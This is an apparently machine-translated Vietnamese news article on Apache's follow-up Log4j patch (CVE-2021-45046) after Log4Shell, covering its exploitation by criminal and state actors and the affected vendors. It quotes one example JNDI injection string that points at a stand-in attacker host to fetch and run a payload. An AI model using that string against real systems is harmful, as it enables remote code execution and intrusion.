Apache Software Foundation (ASF) đã đưa ra một bản sửa lỗi mới cho tiện ích ghi nhật ký Log4j sau bản vá trước đó cho tiện ích được tiết lộ gần đây Log4Shell khai thác được coi là “không hoàn chỉnh trong một số cấu hình không phải mặc định.”
Lỗ hổng thứ hai – được theo dõi là CVE-2021-45046 – được xếp hạng 3,7 trên tổng số tối đa 10 trên hệ thống xếp hạng CVSS và ảnh hưởng đến tất cả các phiên bản của Log4j từ 2.0-beta9 đến 2.12.1 và 2.13.0 đến 2.15.0, các nhà bảo trì dự án đã vận chuyển vào tuần trước để giải quyết một lỗ hổng thực thi mã từ xa quan trọng (CVE-2021-44228) có thể bị lạm dụng để xâm nhập và chiếm lấy hệ thống.
Bản vá chưa hoàn chỉnh cho CVE-2021-44228 có thể bị lạm dụng để “tạo dữ liệu đầu vào độc hại bằng cách sử dụng mẫu Tra cứu JNDI dẫn đến tấn công từ chối dịch vụ (DoS)”, ASF cho biết trong một tư vấn mới. Phiên bản mới nhất của Log4j, 2.16.0 (dành cho người dùng yêu cầu Java 8 trở lên), tất cả trừ hỗ trợ tra cứu tin nhắn và tắt JNDI theo mặc định, thành phần trung tâm của lỗ hổng bảo mật. Người dùng yêu cầu Java 7 được khuyến nghị nâng cấp lên bản phát hành Log4j 2.12.2 khi nó có sẵn.
Ralph Goers của ASF giải thích: “Đối phó với CVE-2021-44228 đã cho thấy JNDI có các vấn đề bảo mật đáng kể. “Mặc dù chúng tôi đã giảm thiểu những gì chúng tôi nhận thức được nhưng sẽ an toàn hơn cho người dùng nếu tắt hoàn toàn nó theo mặc định, đặc biệt là vì phần lớn không có khả năng sử dụng nó.”
JNDI, viết tắt của Java Naming and Directory Interface, là một API Java cho phép các ứng dụng được mã hóa bằng ngôn ngữ lập trình tìm kiếm dữ liệu và tài nguyên như máy chủ LDAP. Log4Shell nằm trong thư viện Log4j, một khung ghi nhật ký mã nguồn mở, dựa trên Java thường được tích hợp vào các máy chủ web Apache.
Sự cố tự xảy ra khi thành phần JNDI của trình kết nối LDAP được tận dụng để đưa vào một yêu cầu LDAP độc hại – chẳng hạn như “$ {jndi: ldap: // attacker_controled_website / payload_to_be_executed}” – tức là khi đăng nhập trên máy chủ web chạy phiên bản dễ bị tấn công của thư viện, cho phép kẻ thù truy xuất tải trọng từ một miền từ xa và thực thi nó cục bộ.
Bản cập nhật mới nhất xuất hiện khi lỗ hổng từ lỗ hổng đã dẫn đến “đại dịch mạng thực sự”, điều mà một số tác nhân đe dọa đang nắm giữ trên Log4Shell theo những cách đặt nền tảng cho các cuộc tấn công tiếp theo, bao gồm triển khai công cụ khai thác tiền, trojan truy cập từ xa và ransomware trên những kẻ dễ bị tấn công máy móc. Các cuộc xâm nhập cơ hội được cho là đã bắt đầu ít nhất kể từ ngày 1 tháng 12, mặc dù lỗi này đã trở thành thông tin phổ biến vào ngày 9 tháng 12.
Lỗ hổng bảo mật đã gây ra cảnh báo rộng rãi vì nó tồn tại trong một khuôn khổ ghi nhật ký được sử dụng gần như phổ biến trong các ứng dụng Java, tạo ra các tác nhân xấu với một cổng chưa từng có để xâm nhập và xâm nhập hàng triệu thiết bị trên khắp thế giới.
Rắc rối thêm về chính tả đối với các tổ chức, lỗ hổng có thể khai thác từ xa cũng ảnh hưởng đến hàng trăm sản phẩm doanh nghiệp lớn từ một số công ty như Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler và Zoho, đặt ra rủi ro chuỗi cung ứng phần mềm đáng kể.
“Không giống như các cuộc tấn công mạng lớn khác liên quan đến một hoặc một số phần mềm hạn chế, Log4j về cơ bản được nhúng vào mọi sản phẩm hoặc dịch vụ web dựa trên Java. Rất khó để khắc phục nó theo cách thủ công”, công ty bảo mật Check Point của Israel cho biết. “Lỗ hổng này, vì sự phức tạp trong việc vá lỗi và dễ dàng khai thác, có vẻ như nó sẽ ở lại với chúng ta trong nhiều năm tới, trừ khi các công ty và dịch vụ có hành động ngay lập tức để ngăn chặn các cuộc tấn công vào sản phẩm của họ bằng cách triển khai biện pháp bảo vệ.”
Trong những ngày sau khi lỗi được tiết lộ, ít nhất mười nhóm khác nhau đã tham gia vào cuộc khai thác và khoảng 44% mạng công ty trên toàn cầu đã bị tấn công, đánh dấu một sự leo thang đáng kể. Hơn nữa, các băng nhóm tội phạm đóng vai trò môi giới truy cập đã bắt đầu sử dụng lỗ hổng này để giành được chỗ đứng ban đầu trong các mạng mục tiêu và sau đó bán quyền truy cập cho các chi nhánh của ransomware-as-a-service (RaaS).
Điều này cũng bao gồm các tổ chức quốc gia-nhà nước có nguồn gốc từ Trung Quốc, Iran, Triều Tiên và Thổ Nhĩ Kỳ, với Microsoft lưu ý rằng “hoạt động bao gồm thử nghiệm trong quá trình phát triển, tích hợp lỗ hổng bảo mật để triển khai trọng tải trong tự nhiên và khai thác chống lại các mục tiêu đạt được các mục tiêu của diễn viên. “
Việc vũ khí hóa quy mô lớn đối với lỗ hổng thực thi mã từ xa đã khiến Cơ quan An ninh mạng và Cơ sở hạ tầng Hoa Kỳ (cisa) thêm Log4Shell vào Danh mục các lỗ hổng được khai thác đã biết, đưa ra thời hạn cho các cơ quan liên bang là ngày 24 tháng 12 để kết hợp các bản vá cho lỗ hổng này và thúc giục các nhà cung cấp để “ngay lập tức xác định, giảm thiểu và vá các sản phẩm bị ảnh hưởng bằng cách sử dụng Log4j.”
Sean Gallagher, một nhà nghiên cứu mối đe dọa cấp cao tại Sophos, cảnh báo rằng “những kẻ thù có khả năng lấy được nhiều quyền truy cập vào bất cứ thứ gì họ có thể có ngay bây giờ với mục tiêu kiếm tiền và / hoặc tận dụng nó sau này,” nói thêm rằng có một khoảng thời gian tạm lắng trước khi bão về hoạt động bất chính nhiều hơn từ lỗ hổng Log4Shell. “
“Ưu tiên trước mắt nhất đối với những người bảo vệ là giảm khả năng bị lộ bằng cách vá và giảm thiểu tất cả các góc của cơ sở hạ tầng của họ cũng như điều tra các hệ thống bị lộ và có khả năng bị xâm phạm. Lỗ hổng này có thể ở khắp mọi nơi”, Gallagher nói thêm.
.